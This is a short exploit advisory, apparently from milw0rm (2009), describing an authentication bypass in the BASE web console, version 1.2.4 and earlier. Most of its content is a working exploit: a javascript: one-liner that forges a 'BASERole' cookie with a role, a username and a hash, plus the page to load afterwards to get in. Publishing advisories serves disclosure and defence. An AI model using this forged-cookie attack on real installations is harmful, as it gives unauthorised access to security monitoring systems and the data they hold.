Authentication Bypass in BASE version 1.2.4 and prior - Insecure Cookie Handling Vulnerability -------------------------------------------- Author.: Tim Medin Contact: nidem.nidem [at] gmail [d0t] com ------------------------------------------------------------------------------------------------- Exploit: javascript:document.cookie="BASERole=10000|nidem|794b69ad33015df95578d5f4a19d390e; path=/"; Note: After creating cookie go to http://[website]/base_main.php # milw0rm.com [2009-06-24]